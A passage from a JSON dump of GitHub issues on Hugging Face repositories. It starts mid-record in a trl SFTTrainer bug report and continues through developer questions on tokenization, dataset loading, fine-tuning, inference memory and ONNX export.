self.instances[\"label\"][idx]\r\n\r\n\t\titem=self.tokenize(prompt+labels)\r\n\t\ttokenized_instruction=self.tokenize(prompt)\r\n\t\tlabel_instruction=self.tokenizer(labels)\r\n\r\n\t\ti=len(tokenized_instruction[\"input_ids\"])\r\n\t\titem[\"labels\"][i:]=label_instruction[\"input_ids\"]\r\n\r\n\t\treturn item\r\n\r\n\tdef tokenize(self, prompt):\r\n\t\tresult_prompt=self.tokenizer(prompt, \r\n\t\t\t\ttruncation=True, \r\n\t\t\t\tmax_length=2048,\r\n\t\t\t\tpadding=False,\r\n\t\t\t\treturn_tensors=None)\r\n\r\n\t\tresult_prompt[\"labels\"]=[-100]*len(result_prompt[\"input_ids\"])\t\r\n\t\treturn result_prompt\r\n\r\n\tdef __len__(self):\r\n\t\treturn len(self.instances)\r\nI am calling the trainer like this:\r\n\ttrainer=SFTTrainer(\r\n\t\tmodel=model,\r\n\t\ttokenizer=tokenizer,\r\n\t\ttrain_dataset=dataset,\r\n\t\tpeft_config=peft_config,\r\n\t\tpacking=True,\r\n data_coolator=DataCollatorForSeq2Seq(tokenizer, pad_to_multiple_of=8, return_tensors=\"pt\", padding=\"max_length\", max_length=2048)\r\n\t\targs=training_arguments)\r\n\ttrainer.train()\r\n\r\n\r\n\r\nThis is the error I am currently getting, but I am not sure, this has something to do with sfttrainer \r\n\u256d\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 Traceback (most recent call last) \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e\r\n\u2502 /home/students/kulcsar/Bachelor/for_dataset/10000_diagnoses/falcon_model_pef \u2502\r\n\u2502 t.py:544 in \u2502\r\n\u2502 \u2502\r\n\u2502 541 \u2502 \u2502\r\n\u2502 542 \u2502 \u2502\r\n\u2502 543 \u2502 args=parser.parse_args() \u2502\r\n\u2502 \u2771 544 \u2502 run() \u2502\r\n\u2502 545 \u2502 #main() \u2502\r\n\u2502 546 \u2502 \u2502\r\n\u2502 547 \u2502 #all_data, prompts, golds=preprocess(\"./dataset.pkl\") \u2502\r\n\u2502 \u2502\r\n\u2502 /home/students/kulcsar/Bachelor/for_dataset/10000_diagnoses/falcon_model_pef \u2502\r\n\u2502 t.py:153 in run \u2502\r\n\u2502 \u2502\r\n\u2502 150 \u2502 \u2502 packing=True, \u2502\r\n\u2502 151 \u2502 \u2502 data_collator=DataCollatorForSeq2Seq(tokenizer, pad_to_multipl \u2502\r\n\u2502 152 \u2502 \u2502 args=training_arguments) \u2502\r\n\u2502 \u2771 153 \u2502 trainer.train() \u2502\r\n\u2502 154 \u2502 \u2502\r\n\u2502 155 \u2502 logging.info(\"Run Train loop\") \u2502\r\n\u2502 156 \u2502 #model_updated=train(model, dataset, args.seed, args.batch_size, a \u2502\r\n\u2502 \u2502\r\n\u2502 /home/students/kulcsar/anaconda3/envs/software_bubble_updated_pytorch/lib/py \u2502\r\n\u2502 thon3.9/site-packages/transformers/trainer.py:1537 in train \u2502\r\n\u2502 \u2502\r\n\u2502 1534 \u2502 \u2502 inner_training_loop = find_executable_batch_size( \u2502\r\n\u2502 1535 \u2502 \u2502 \u2502 self._inner_training_loop, self._train_batch_size, args.a \u2502\r\n\u2502 1536 \u2502 \u2502 ) \u2502\r\n\u2502 \u2771 1537 \u2502 \u2502 return inner_training_loop( \u2502\r\n\u2502 1538 \u2502 \u2502 \u2502 args=args, \u2502\r\n\u2502 1539 \u2502 \u2502 \u2502 resume_from_checkpoint=resume_from_checkpoint, \u2502\r\n\u2502 1540 \u2502 \u2502 \u2502 trial=trial, \u2502\r\n\u2502 \u2502\r\n\u2502 /home/students/kulcsar/anaconda3/envs/software_bubble_updated_pytorch/lib/py \u2502\r\n\u2502 thon3.9/site-packages/transformers/trainer.py:1802 in _inner_training_loop \u2502\r\n\u2502 \u2502\r\n\u2502 1799 \u2502 \u2502 \u2502 \u2502 \u2502 self.control = self.callback_handler.on_step_begi \u2502\r\n\u2502 1800 \u2502 \u2502 \u2502 \u2502 \u2502\r\n\u2502 1801 \u2502 \u2502 \u2502 \u2502 with self.accelerator.accumulate(model): \u2502\r\n\u2502 \u2771 1802 \u2502 \u2502 \u2502 ", "url": "https://github.com/huggingface/trl/issues/503", "state": "closed", "labels": [], "created_at": "2023-07-06T22:19:21Z", "updated_at": "2023-08-14T15:05:10Z", "user": "MaggieK410" }, { "repo": "huggingface/transformers.js", "number": 182, "title": "Website and extension using same model", "body": "Per the chrome extension example, you pack the model with the extension. Is there a way for a website and chrome extension to use the same cached model? If my project has both a website and extension, I hope they could use a single model instead of having store 2 on the user's machine. \r\n", "url": "https://github.com/huggingface/transformers.js/issues/182", "state": "open", "labels": [ "question" ], "created_at": "2023-07-06T17:43:48Z", "updated_at": "2023-07-16T17:26:09Z", "user": "escottgoodwin" }, { "repo": "huggingface/chat-ui", "number": 331, "title": "How to send model name as a input to API endpoint", "body": "I want to host two models and query them by switching between . The problem is I'm not able to send model name as a parameter from UI to API endpoints.\r\n\r\nCan someone help on this?", "url": "https://github.com/huggingface/chat-ui/issues/331", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-06T13:04:04Z", "updated_at": "2023-09-18T14:03:18Z", "user": "sankethgadadinni" }, { "repo": "huggingface/transformers", "number": 24685, "title": "How to get the last 4 Hidden states from the feature extraction pipeline", "body": "I have defined a pipeline for Feature extraction\r\n```\r\n# Create the pipeline\r\np = pipeline(\r\n task=\"feature-extraction\",\r\n tokenizer=\"microsoft/biogpt\",\r\n model=\"microsoft/biogpt\",\r\n framework=\"pt\",\r\n device=0\r\n)\r\nbio_gpt = AutoModel.from_pretrained(\"microsoft/biogpt\", output_hidden_states= True)\r\nbio_gpt = bio_gpt.to(device)\r\n```\r\n\r\nand I want to extract the embeddings of the last token of the last hidden state, and the Average Pooling of the last 4 layers using the pipeline approach I am doing it like this\r\n\r\n_Last token of the last hidden state:_\r\n\r\n```\r\ndef extract_last_token(last_hidden_states):\r\n last_hidden_states = np.array(last_hidden_states)\r\n return last_hidden_states[:,-1,:]\r\n\r\n# Process the data using the pipeline\r\nresults = p([row[\"text\"] for _, row in df2.iterrows()])\r\n\r\n# Extract the last token of the last hidden state\r\nembeddings = [extract_last_token(hidden_state) for hidden_state in results]\r\n\r\n# Create a DataFrame to store the results\r\ndf2[\"embeddings2\"] = embeddings\r\n```\r\n_Average pooling of the last 4 layers:_\r\n```\r\ndef mean_pooling(last_hidden_states, ):\r\n last_4_layers = last_hidden_states[-4:] # Consider the last 4 layers\r\n return np.mean(last_4_layers, axis=1)\r\n\r\n# Process the data using the pipeline\r\nresults = p([row[\"text\"] for _, row in df2.iterrows()])\r\n\r\nfeatures = np.squeeze(results)\r\n\r\nprint(features.shape)\r\n# Perform mean pooling on the last hidden states\r\nembeddings = [mean_pooling(hidden_state) for hidden_state in results]\r\n\r\n# Create a DataFrame to store the results\r\ndf2[\"embeddings4\"] = embeddings\r\n```\r\nThe issues are:\r\n\r\n1. When I extract the embeddings of the 4 last layers or the 12 last layers the embeddings are always the same\r\n\r\n![image](https://github.com/huggingface/transformers/assets/138615931/70c265aa-4182-4265-bb22-ddc197388c03)\r\n\r\n2. The embeddings of the last token of the last hidden state are different from the same embeddings using the \"manual\" method\r\n\r\n![image](https://github.com/huggingface/transformers/assets/138615931/a7b9b629-9c65-4b76-b669-89d9e64103de)\r\n\r\nWeardly in the above picture the 2 of the embeddings are the same but opposite row ids, this indicates another problem I don't see it if you can spot this I appreciate it.\r\n\r\nHere is the code of how I did the manual version\r\n```\r\noutput = bio_gpt(**model_inputs)\r\n\r\n# Get the last state\r\nlast_state = output.last_hidden_state\r\n\r\ncls_embeddings = last_state[:, -1, :]\r\n\r\n# Print the last state\r\nprint(cls_embeddings)\r\n\r\n# Assign cls_embeddings to \"embeddings4\" column in df2\r\ndf2[\"embeddings_manual\"] = [cls_embeddings[i].cpu().detach().numpy() for i in range(len(df2))]\r\n```", "url": "https://github.com/huggingface/transformers/issues/24685", "state": "closed", "labels": [], "created_at": "2023-07-06T08:45:08Z", "updated_at": "2023-08-14T15:02:35Z", "user": "Luke-4" }, { "repo": "huggingface/setfit", "number": 393, "title": " AttributeError: 'list' object has no attribute 'shuffle'", "body": "I am getting the \"AttributeError: 'list' object has no attribute 'shuffle'\" error when I try to use setfit.\r\n\r\nThe dataset has two columns; one text and the second is the label column.", "url": "https://github.com/huggingface/setfit/issues/393", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-05T16:47:17Z", "updated_at": "2023-12-05T14:41:13Z", "user": "gpirge" }, { "repo": "huggingface/datasets", "number": 6008, "title": "Dataset.from_generator consistently freezes at ~1000 rows", "body": "### Describe the bug\n\nWhenever I try to create a dataset which contains images using `Dataset.from_generator`, it freezes around 996 rows. I suppose it has something to do with memory consumption, but there's more memory available. I\r\n\r\nSomehow it worked a few times but mostly this makes the datasets library much more cumbersome to work with because generators are the easiest way to turn an existing dataset into a Hugging Face dataset.\r\n\r\nI've let it run in the frozen state for way longer than it can possibly take to load the actual dataset.\r\n\r\nLet me know if you have ideas how to resolve it!\n\n### Steps to reproduce the bug\n\n```python\r\nfrom datasets import Dataset\r\nimport numpy as np\r\n\r\ndef gen():\r\n for row in range(10000):\r\n yield {\"i\": np.random.rand(512, 512, 3)}\r\n \r\nDataset.from_generator(gen)\r\n# -> 90% of the time gets stuck around 1000 rows\r\n```\n\n### Expected behavior\n\nShould continue and go through all the examples yielded by the generator, or at least throw an error or somehow communicate what's going on.\n\n### Environment info\n\n- `datasets` version: 2.8.0\r\n- Platform: Linux-5.15.0-52-generic-x86_64-with-glibc2.29\r\n- Python version: 3.8.10\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 1.5.1\r\n", "url": "https://github.com/huggingface/datasets/issues/6008", "state": "closed", "labels": [], "created_at": "2023-07-05T16:06:48Z", "updated_at": "2023-07-10T13:46:39Z", "comments": 3, "user": "andreemic" }, { "repo": "huggingface/dataset-viewer", "number": 1482, "title": "diagnose why the mongo server uses so much CPU", "body": "we have many alerts on the use of CPU on the mongo server.\r\n\r\n```\r\nSystem: CPU (User) % has gone above 95 \r\n```\r\n\r\n Why?", "url": "https://github.com/huggingface/dataset-viewer/issues/1482", "state": "closed", "labels": [ "question", "infra", "improvement / optimization", "P1" ], "created_at": "2023-07-04T16:04:06Z", "updated_at": "2024-02-06T14:49:20Z", "user": "severo" }, { "repo": "huggingface/text-generation-inference", "number": 536, "title": "How to enable vllm", "body": "### Feature request\n\nHow to enable vllm\n\n### Motivation\n\nHow to enable vllm\n\n### Your contribution\n\nHow to enable vllm", "url": "https://github.com/huggingface/text-generation-inference/issues/536", "state": "closed", "labels": [], "created_at": "2023-07-04T05:20:21Z", "updated_at": "2023-07-04T10:56:29Z", "user": "lucasjinreal" }, { "repo": "huggingface/transformers.js", "number": 180, "title": "[Question] Running transformers.js in a browser extension", "body": "Hello,\r\n\r\nI'm trying to build a chrome extension that uses Transformers.js. When I try to import it in the background worker script, I first get an error that says process is not available, because apparently someone decided browser plugins shouldn't use process.env anymore. I found a solution that said to put \r\n```\r\ndefine: {\r\n 'process.env': {}\r\n}\r\n```\r\nin my vite.config.js, which worked to get me past that, but the next error is:\r\n```\r\nError: Dynamic require of \"../bin/napi-v3/undefined/undefined/onnxruntime_binding.node\" is not supported\r\n```\r\nHas anyone gotten this working in a browser environment yet? I saw a video about tensorflow.js in the browser, but I'd prefer to use transformers.js because you already provided me with an example of how to get it to behave like Sentence Transformers. :) ", "url": "https://github.com/huggingface/transformers.js/issues/180", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-04T01:09:29Z", "updated_at": "2023-07-16T15:58:30Z", "user": "davidtbo" }, { "repo": "huggingface/datasets", "number": 6003, "title": "interleave_datasets & DataCollatorForLanguageModeling having a conflict ?", "body": "### Describe the bug\n\nHi everyone :)\r\n\r\nI have two local & custom datasets (1 \"sentence\" per line) which I split along the 95/5 lines for pre-training a Bert model. I use a modified version of `run_mlm.py` in order to be able to make use of `interleave_dataset`:\r\n\r\n- `tokenize()` runs fine\r\n- `group_text()` runs fine\r\n\r\nEverytime, on step 19, I get \r\n\r\n```pytb\r\n File \"env/lib/python3.9/site-packages/transformers/data/data_collator.py\", line 779, in torch_mask_tokens\r\n inputs[indices_random] = random_words[indices_random]\r\nRuntimeError: Index put requires the source and destination dtypes match, got Float for the destination and Long for the source.\r\n```\r\n\r\nI tried:\r\n- training without interleave on dataset 1, it runs\r\n- training without interleave on dataset 2, it runs\r\n- training without `.to_iterable_dataset()`, it hangs then crash\r\n- training without group_text() and padding to max_length seemed to fix the issue, but who knows if this was just because it was an issue that would come much later in terms of steps.\r\n\r\nI might have coded something wrong, but I don't get what \n\n### Steps to reproduce the bug\n\nI have this function:\r\n\r\n```py\r\ndef build_dataset(path: str, percent: str):\r\n dataset = load_dataset(\r\n \"text\",\r\n data_files={\"train\": [path]},\r\n split=f\"train[{percent}]\"\r\n )\r\n dataset = dataset.map(\r\n lambda examples: tokenize(examples[\"text\"]),\r\n batched=True,\r\n num_proc=num_proc,\r\n )\r\n\r\n dataset = dataset.map(\r\n group_texts,\r\n batched=True,\r\n num_proc=num_proc,\r\n desc=f\"Grouping texts in chunks of {tokenizer.max_seq_length}\",\r\n remove_columns=[\"text\"]\r\n )\r\n\r\n print(len(dataset))\r\n return dataset.to_iterable_dataset()\r\n```\r\n\r\nI hardcoded group_text:\r\n```py\r\n def group_texts(examples):\r\n # Concatenate all texts.\r\n concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}\r\n total_length = len(concatenated_examples[list(examples.keys())[0]])\r\n # We drop the small remainder, and if the total_length < max_seq_length we exclude this batch and return an empty dict.\r\n # We could add padding if the model supported it instead of this drop, you can customize this part to your needs.\r\n total_length = (total_length // 512) * 512\r\n # Split by chunks of max_len.\r\n result = {\r\n k: [t[i: i + 512] for i in range(0, total_length, 512)]\r\n for k, t in concatenated_examples.items()\r\n }\r\n # result = {k: [el for el in elements if el] for k, elements in result.items()}\r\n return result\r\n```\r\n\r\nAnd then I build datasets using the following code:\r\n\r\n```py\r\ntrain1 = build_dataset(\"d1.txt\", \":95%\")\r\ntrain2 = build_dataset(\"d2.txt\", \":95%\")\r\ndev1 = build_dataset(\"d1.txt\", \"95%:\")\r\ndev2 = build_dataset(\"d2.txt\", \"95%:\")\r\n```\r\n\r\nand finally I run\r\n```py\r\ntrain_dataset = interleave_datasets(\r\n [train1, train2],\r\n probabilities=[0.8, 0.2],\r\n seed=42\r\n)\r\neval_dataset = interleave_datasets(\r\n [dev1, dev2],\r\n probabilities=[0.8, 0.2],\r\n seed=42\r\n)\r\n```\r\n\r\nThen I run the training part which remains mostly untouched:\r\n\r\n> CUDA_VISIBLE_DEVICES=1 python custom_dataset.py --model_type bert --per_device_train_batch_size 32 --do_train --output_dir /var/mlm/training-bert/model --max_seq_length 512 --save_steps 10000 --save_total_limit 3 --auto_find_batch_size --logging_dir ./logs-bert --learning_rate 0.0001 --do_train --num_train_epochs 25 --warmup_steps 10000 --max_step 45000 --fp16\n\n### Expected behavior\n\nThe model should then train normally, but fails every time at the same step (19).\r\n\r\nprinting the variables at `inputs[indices_random] = random_words[indices_random]` shows a magnificient empty tensor (, 32) [if I remember well]\n\n### Environment info\n\ntransformers[torch] 4.30.2\r\nUbuntu\r\nA100 0 CUDA 12\r\nDriver Version: 525.116.04", "url": "https://github.com/huggingface/datasets/issues/6003", "state": "open", "labels": [], "created_at": "2023-07-03T17:15:31Z", "updated_at": "2023-07-03T17:15:31Z", "comments": 0, "user": "PonteIneptique" }, { "repo": "huggingface/dataset-viewer", "number": 1472, "title": "How to show fan-in jobs' results in response (\"pending\" and \"failed\" keys)", "body": "In cache entries of fan-in jobs we have keys `pending` and `failed`. For example, config-level `/parquet` response has the following format (only \"parquet_files\" key):\r\n```python\r\n{\r\n \"parquet_files\": [\r\n {\r\n \"dataset\": \"duorc\",\r\n \"config\": \"ParaphraseRC\",\r\n \"split\": \"test\",\r\n \"url\": \"https://huggingface.co/datasets/duorc/resolve/refs%2Fconvert%2Fparquet/ParaphraseRC/duorc-test.parquet\",\r\n \"filename\": \"duorc-test.parquet\",\r\n \"size\": 6136591\r\n },\r\n ... # list of parquet files\r\n ],\r\n}\r\n``` \r\nand for dataset-level it also has `pending` and `failed` keys:\r\n```python\r\n{\r\n \"parquet_files\": [\r\n {\r\n \"dataset\": \"duorc\",\r\n \"config\": \"ParaphraseRC\",\r\n \"split\": \"test\",\r\n \"url\": \"https://huggingface.co/datasets/duorc/resolve/refs%2Fconvert%2Fparquet/ParaphraseRC/duorc-test.parquet\",\r\n \"filename\": \"duorc-test.parquet\",\r\n \"size\": 6136591\r\n },\r\n ... # list of parquet files\r\n ],\r\n \"pending\": [],\r\n \"failed\": []\r\n}\r\n```\r\nTo me, undocumented `\"pending\"` and `\"failed\"` keys look a bit too technical and unclear.\r\n\r\nWhat we can do:\r\n* document what these keys mean\r\n* don't document it but also for these kind of endpoints show only examples where all levels are specified (currently it's not like this). So, don't show examples that return `pending` and `failed` field.\r\n* anything else? @huggingface/datasets-server ", "url": "https://github.com/huggingface/dataset-viewer/issues/1472", "state": "open", "labels": [ "question", "api", "P2" ], "created_at": "2023-07-03T16:49:10Z", "updated_at": "2023-08-11T15:26:24Z", "user": "polinaeterna" }, { "repo": "huggingface/blog", "number": 1281, "title": "How to push or shere lora adapter to hugging face hub? ", "body": "hi, i trained falcon model and already set push_to_hub paramter in training argument, but they not working.\r\n\r\n```\r\nfrom transformers import TrainingArguments\r\n\r\noutput_dir = \"chatb_f\"\r\nper_device_train_batch_size = 4\r\ngradient_accumulation_steps = 4\r\noptim = \"paged_adamw_32bit\"\r\nsave_steps = 60\r\nlogging_steps = 10\r\nlearning_rate = 2e-4\r\nmax_grad_norm = 0.3\r\nmax_steps = 60\r\nwarmup_ratio = 0.03\r\nlr_scheduler_type = \"constant\"\r\n\r\ntraining_arguments = TrainingArguments(\r\n output_dir=output_dir,\r\n per_device_train_batch_size=per_device_train_batch_size,\r\n gradient_accumulation_steps=gradient_accumulation_steps,\r\n optim=optim,\r\n save_steps=save_steps,\r\n logging_steps=logging_steps,\r\n learning_rate=learning_rate,\r\n fp16=True,\r\n max_grad_norm=max_grad_norm,\r\n max_steps=max_steps,\r\n warmup_ratio=warmup_ratio,\r\n group_by_length=True,\r\n lr_scheduler_type=lr_scheduler_type,\r\n push_to_hub = True\r\n)\r\n\r\n\r\nfrom trl import SFTTrainer\r\n\r\nmax_seq_length = 512\r\n\r\ntrainer = SFTTrainer(\r\n model=model,\r\n train_dataset=dataset,\r\n peft_config=peft_config,\r\n dataset_text_field=\"text\",\r\n max_seq_length=max_seq_length,\r\n tokenizer=tokenizer,\r\n args=training_arguments,\r\n)\r\n```\r\n", "url": "https://github.com/huggingface/blog/issues/1281", "state": "open", "labels": [], "created_at": "2023-07-01T13:56:47Z", "updated_at": "2023-07-01T13:57:40Z", "user": "imrankh46" }, { "repo": "huggingface/diffusers", "number": 3918, "title": "How to control the position of an object in an image using text in a txt2img model?", "body": "How to control the position of an object in an image using text in a txt2img model? I know this is easy to achieve in an img2img model, but how can it be done in a txt2img model?\r\n\r\nOr, how can a model be fine-tuned to achieve this effect? For example, specifying x=0, y=1, which corresponds to the top-left corner.\r\n\r\nI have tried similar approaches, but they are not sensitive to the position. I suspect it may be due to insensitivity to the text input. I tried using compel to enhance the positional features, but still couldn't control the position. Do I need to retrain the text_encoder related part for this?\r\n\r\nIn my fine-tuning code, I commented out the no_grad parts for text_encoder and others. Is this correct, and will it automatically train the text_encoder?\r\n\r\nThank you!", "url": "https://github.com/huggingface/diffusers/issues/3918", "state": "closed", "labels": [ "stale" ], "created_at": "2023-07-01T02:44:24Z", "updated_at": "2023-08-08T15:03:15Z", "user": "XiaoyuZhuang" }, { "repo": "huggingface/dataset-viewer", "number": 1464, "title": "Change the way we represent ResponseAlreadyComputedError in the cache", "body": "When a \"parallel\" step has already been computed, an error is stored in the cache with `ResponseAlreadyComputedError`error_code, and http status 500 (ie: if `split-first-rows-from-streaming` exists, then `split-first-rows-from-parquet` does not need to be computed).\r\n\r\nBut it makes it hard to monitor the \"true\" errors. If we follow the analogy with the HTTP status codes, it should be 3xx instead of 5xx, ie: a redirection to another resource.\r\n\r\nI don't know how we should change this though. Let's put ideas in the issue.", "url": "https://github.com/huggingface/dataset-viewer/issues/1464", "state": "closed", "labels": [ "question", "improvement / optimization", "P2" ], "created_at": "2023-06-30T18:13:34Z", "updated_at": "2024-02-23T09:56:05Z", "user": "severo" }, { "repo": "huggingface/transformers.js", "number": 176, "title": "[Question] Embeddings for the Entire Document", "body": "\r\nHi Thanks for all the effort, I really appreciate it. I enjoy coding in JS and do all things in JS. \r\nIs it a good idea to load the entire json document to get embeddings? What tokenizer should I choose? I have a tone of valuable information in my key and value pairs? or should I craft a sentence from the document?\r\n\r\n```json\r\n{\r\n \"id\": 2053926,\r\n \"city\": \"New York\",\r\n \"user_id\": 3578165,\r\n \"price\": 75,\r\n \"native_currency\": \"USD\",\r\n \"price_native\": 75,\r\n \"price_formatted\": \"$75\",\r\n \"lat\": 40.854397081884706,\r\n \"lng\": -73.93876393071385,\r\n \"country\": \"United States\",\r\n \"name\": \"air conditioned room w/ great view\",\r\n \"smart_location\": \"New York, NY\",\r\n \"has_double_blind_reviews\": false,\r\n \"instant_bookable\": false,\r\n \"bedrooms\": 1,\r\n \"beds\": 1,\r\n \"bathrooms\": 1,\r\n \"market\": \"New York\",\r\n \"min_nights\": 1,\r\n \"neighborhood\": \"Washington Heights\",\r\n \"person_capacity\": 3,\r\n \"state\": \"NY\",\r\n \"zipcode\": \"10033\",\r\n \"user\": {\r\n \"user\": {\r\n \"id\": 3578165,\r\n \"first_name\": \"Benjamin\",\r\n \"has_profile_pic\": true\r\n }\r\n },\r\n \"address\": \"Pinehurst Avenue, New York, NY 10033, United States\",\r\n \"country_code\": \"US\",\r\n \"cancellation_policy\": \"flexible\",\r\n \"property_type\": \"Apartment\",\r\n \"reviews_count\": 14,\r\n \"room_type\": \"Private room\",\r\n \"room_type_category\": \"private_room\",\r\n \"picture_count\": 18,\r\n \"_geoloc\": {\r\n \"lat\": 40.854397081884706,\r\n \"lng\": -73.93876393071385\r\n },\r\n \"objectID\": \"507205000\"\r\n}\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/176", "state": "closed", "labels": [ "question" ], "created_at": "2023-06-30T16:20:37Z", "updated_at": "2023-06-30T22:43:03Z", "user": "hadminh" }, { "repo": "huggingface/sentence-transformers", "number": 2247, "title": "how to tune hyperparameters using optuna or raytune", "body": "I want to finetune the MiniLM model and tune the hyperparameters of the same, but the model.fit function doesn't return any loss. Nor does it shows any performance metrics while training the model. What do you suggest in this case?", "url": "https://github.com/huggingface/sentence-transformers/issues/2247", "state": "open", "labels": [], "created_at": "2023-06-30T13:16:04Z", "updated_at": "2023-06-30T13:16:04Z", "user": "nikshrimali" }, { "repo": "huggingface/diffusers", "number": 3914, "title": "how to fine-tuning the sd model in low resolutions", "body": "When fine-tuning the stable diffusion model, there is a parameter called 'resolution' which, if set to a value like 128 or 256 to reduce GPU memory usage, could potentially have negative effects on training performance and results.\r\n\r\nWould setting the resolution to a value other than 512, such as 128 or 256, have any adverse impact on training effectiveness and the final results?\r\n\r\nIs there a way to modify the pre-trained model's resolution to 128 or 256, or do I need to train a separate low-resolution version of the model?\r\n\r\nI have experimented with different resolutions, and it seems that setting the resolution to 512 produces the best results. Training with lower resolutions tends to generate complex and messy outputs.\r\n\r\nI couldn't find any similar issues on GitHub, as most discussions focus on super-resolution. Thank you for your response!", "url": "https://github.com/huggingface/diffusers/issues/3914", "state": "closed", "labels": [ "stale" ], "created_at": "2023-06-30T12:42:12Z", "updated_at": "2023-08-08T15:03:16Z", "user": "XiaoyuZhuang" }, { "repo": "huggingface/optimum", "number": 1148, "title": "Falcon-40b-instruct on Runpod", "body": "### System Info\n\n```shell\n2 x A100 80GB\r\n32 vCPU 251 GB RAM\n```\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\r\nimport transformers\r\nimport torch\r\n\r\nmodel = \"tiiuae/falcon-40b-instruct\"\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(model)\r\npipeline = transformers.pipeline(\r\n \"text-generation\",\r\n model=model,\r\n tokenizer=tokenizer,\r\n torch_dtype=torch.bfloat16,\r\n trust_remote_code=True,\r\n device_map=\"auto\",\r\n)\r\nsequences = pipeline(\r\n \"What does a raindrop feel when it hits the sea?:\",\r\n max_length=200,\r\n do_sample=True,\r\n top_k=10,\r\n num_return_sequences=1,\r\n eos_token_id=tokenizer.eos_token_id,\r\n)\r\nfor seq in sequences:\r\n print(f\"Result: {seq['generated_text']}\")\r\n\r\n\r\n\n\n### Expected behavior\n\nExpected to Run smoothly, give an output. \r\nError : \r\nThe model 'RWForCausalLM' is not supported for text-generation. Supported models are ['BartForCausalLM', 'BertLMHeadModel', 'BertGenerationDecoder', 'BigBirdForCausalLM', 'BigBirdPegasusForCausalLM', 'BioGptForCausalLM', 'BlenderbotForCausalLM', 'BlenderbotSmallForCausalLM', 'BloomForCausalLM', 'CamembertForCausalLM', 'CodeGenForCausalLM', 'CpmAntForCausalLM', 'CTRLLMHeadModel', 'Data2VecTextForCausalLM', 'ElectraForCausalLM', 'ErnieForCausalLM', 'GitForCausalLM', 'GPT2LMHeadModel', 'GPT2LMHeadModel', 'GPTBigCodeForCausalLM', 'GPTNeoForCausalLM', 'GPTNeoXForCausalLM', 'GPTNeoXJapaneseForCausalLM', 'GPTJForCausalLM', 'LlamaForCausalLM', 'MarianForCausalLM', 'MBartForCausalLM', 'MegaForCausalLM', 'MegatronBertForCausalLM', 'MvpForCausalLM', 'OpenLlamaForCausalLM', 'OpenAIGPTLMHeadModel', 'OPTForCausalLM', 'PegasusForCausalLM', 'PLBartForCausalLM', 'ProphetNetForCausalLM', 'QDQBertLMHeadModel', 'ReformerModelWithLMHead', 'RemBertForCausalLM', 'RobertaForCausalLM', 'RobertaPreLayerNormForCausalLM', 'RoCBertForCausalLM', 'RoFormerForCausalLM', 'RwkvForCausalLM', 'Speech2Text2ForCausalLM', 'TransfoXLLMHeadModel', 'TrOCRForCausalLM', 'XGLMForCausalLM', 'XLMWithLMHeadModel', 'XLMProphetNetForCausalLM', 'XLMRobertaForCausalLM', 'XLMRobertaXLForCausalLM', 'XLNetLMHeadModel', 'XmodForCausalLM'].\r\n/usr/local/lib/python3.10/dist-packages/transformers/generation/utils.py:1259: UserWarning: You have modified the pretrained model configuration to control generation. This is a deprecated strategy to control generation and will be removed soon, in a future version. Please use a generation configuration file (see https://huggingface.co/docs/transformers/main_classes/text_generation)\r\n warnings.warn(\r\nSetting `pad_token_id` to `eos_token_id`:11 for open-end generation.", "url": "https://github.com/huggingface/optimum/issues/1148", "state": "closed", "labels": [ "bug" ], "created_at": "2023-06-29T18:48:05Z", "updated_at": "2023-06-30T15:39:29Z", "comments": 3, "user": "Mrin7" }, { "repo": "huggingface/text-generation-inference", "number": 509, "title": "Question: How to estimate memory requirements for a certain batch size/", "body": "I was just wondering how the GPU memory requirements vary depending on model size/batch size of request/max tokens. In doing some experiments where I needed the server to keep running for a long time, I found that it often ran out of memory and shut down - is there a way to estimate the memory footprint based on these variables?", "url": "https://github.com/huggingface/text-generation-inference/issues/509", "state": "closed", "labels": [], "created_at": "2023-06-29T15:39:51Z", "updated_at": "2023-07-03T01:41:02Z", "user": "vaishakkrishna" }, { "repo": "huggingface/transformers.js", "number": 171, "title": "[Doc request] Add an example guide of how to use it in Svelte (and deploy to HF Spaces)", "body": "Similar to the cool React guide, would be awesome to showcase how to use transformers.js from Svelte (and how to deploy the resulting app to Spaces)\r\n\r\nNo need to do a SvelteKit version IMO, Svelte would be sufficient\r\n\r\nMaybe a good first issue for the community?", "url": "https://github.com/huggingface/transformers.js/issues/171", "state": "open", "labels": [ "enhancement", "help wanted", "good first issue" ], "created_at": "2023-06-29T10:25:10Z", "updated_at": "2023-08-21T20:36:59Z", "user": "julien-c" }, { "repo": "huggingface/optimum", "number": 1145, "title": "How to use mean pooling with ONNX export with optimum-cli", "body": "### System Info\n\n```shell\n- `optimum` version: 1.8.8\r\n- `transformers` version: 4.30.2\r\n- Platform: Windows-10-10.0.19045-SP0\r\n- Python version: 3.11.3\r\n- Huggingface_hub version: 0.15.1\r\n- PyTorch version (GPU?): 2.0.1+cpu (cuda availabe: False)\r\n- Tensorflow version (GPU?): not installed (cuda availabe: NA)\n```\n\n\n### Who can help?\n\n@michaelbenayoun\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nThe Model card of paraphrase-MiniLM-L3-v2 at HuggingFace mentions that\r\n\r\n**Without [sentence-transformers](https://www.sbert.net/), you can use the model like this: First, you pass your input through the transformer model, then you have to apply the right pooling-operation on-top of the contextualized word embeddings.**\r\n\r\nHow to do this using the ONNX model generated using the optimum-cli?\r\n\r\nCan we do this while generating the ONNX model? \r\n\r\nFor example, the **txtai** library does this 